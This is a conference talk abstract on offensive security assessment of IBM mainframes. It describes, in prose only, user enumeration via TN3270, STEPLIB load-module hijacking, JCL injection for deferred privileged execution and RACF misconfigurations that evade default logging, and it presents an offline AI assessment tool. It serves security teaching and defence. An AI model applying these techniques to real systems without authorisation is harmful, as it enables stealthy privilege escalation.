OrangeCon 2026

Mainframes are not legacy systems in the way the industry uses that word. They are actively maintained, actively targeted, and actively misunderstood. The security gap exists not because the systems are old but because the mental models used to assess them are wrong. This talk addresses that gap directly.

The Technical Problem

Modern offensive security methodology is built around a set of assumptions that do not hold on z/OS: that privilege is binary and anchored to a user account, that lateral movement happens through network services, that execution is interactive and session-bound, and that a process tree or endpoint agent will surface attacker behavior. None of these are true on a mainframe.

z/OS organizes authority across five subsystems, each with a distinct security boundary. VTAM controls session establishment and terminal binding. TSO binds interactive identity and provides the context under which all commands, dataset access, and job submissions are authorized. RACF enforces access continuously, per resource, before execution. JES queues and schedules deferred work, executing it later under the identity of the submitter, outside any interactive session. CICS controls transaction execution and enforces authorization at the transaction level, not the program level.

An attacker who understands these boundaries can move through them without triggering any of the detection mechanisms a modern SOC relies on. An attacker who does not understand them will misread what they see, take actions with unintended consequences, and likely miss the actual exposure entirely.

The Techniques

The talk covers four concrete attack paths, each demonstrated against a live MVS 3.8j environment running on Hercules:

TN3270 user enumeration exploits differential response behavior at the VTAM logon screen. Valid userids produce a password prompt. Invalid userids produce an immediate rejection. This is consistent across implementations and requires no authentication. It is the standard first step in any mainframe assessment and is supported by existing Nmap scripting engine scripts.

STEPLIB hijacking exploits the mainframe program library search order. When a user submits a job with a STEPLIB DD statement pointing to a dataset they control, MVS searches that library first before system libraries. If an attacker has UPDATE access to any dataset that appears in the STEPLIB concatenation of a higher-privileged job, they can replace a load module and have it execute under the job's authority. No vulnerability is exploited. RACF does not prevent it. No alert fires by default. SMF records the execution but nobody is watching. This is a direct analog to DLL hijacking or LD_PRELOAD injection and represents a supply chain attack against the batch execution environment.

JCL injection for deferred privileged execution covers the case where an attacker can influence the JCL stream of a job that runs under a more privileged identity. Because JES executes work later under the submitter's RACF context, and because that context persists after the interactive session ends, an attacker can submit work, log off, and have privileged code execute minutes or hours later with no active session to detect. This breaks every assumption about session-based detection.

RACF misconfiguration paths cover the most common findings in real assessments: overbroad dataset profiles using high-level qualifier wildcards, excessive group authority granted through organic entitlement growth, SURROGAT class entries that allow job submission under another user's identity, and APF library dataset permissions that allow non-privileged users to introduce authorized code. Each of these is a configuration failure, not a vulnerability, and none of them produce alerts in a default SMF configuration.

The Tool

BigIron.ai is an open-source, fully offline AI-assisted assessment platform built specifically for z/OS and MVS environments. It is not a scanner. It is a reasoning layer that sits between the assessor and the TN3270 terminal.

The platform runs a local language model via Ollama against live TN3270 session output. When the assessor captures a screen, the LLM identifies the active control plane, interprets the identity context, flags assumptions that may be wrong, and provides guidance on what to do next. It does not connect to any external service. No screen content, no credentials, no assessment data leaves the machine.

Beyond the AI layer, the platform includes thirteen scripted autonomous walkthroughs across all five control planes, a findings engine that maps results to a repeatable F1 through F5 assessment framework, a TN3270 network scanner for mainframe discovery, a RAG knowledge base ingesting IBM Redbooks and ABEND reference material, and a red team tutor with structured labs and engagement checklists.

The demo environment runs MVS 3.8j Turnkey on Hercules. This is appropriate for demonstrating control-plane mechanics, VTAM session behavior, TSO identity binding, JES submission and spool, and dataset access patterns. Where z/OS behavior differs meaningfully, those differences are noted explicitly.

The Audience

The talk is designed for offensive security practitioners who have encountered mainframes in scope and had no framework for assessing them, defensive practitioners who are responsible for mainframe environments but have no visibility into what an attacker would actually do, and security engineers building detection or assessment programs who need an accurate model of how the system works before they can reason about what to monitor.

No mainframe background is assumed. The talk builds the required mental model from first principles, using analogies to concepts the audience already knows, then applies that model to concrete attack paths and a live tool demonstration.

What Attendees Leave With

A correct mental model of mainframe authority and execution that replaces the cloud and Linux assumptions most practitioners carry in. A repeatable assessment methodology structured around control planes rather than hosts and services. Familiarity with four concrete attack techniques that have been observed in production assessments. Access to an open-source tool they can run immediately against any MVS or z/OS environment.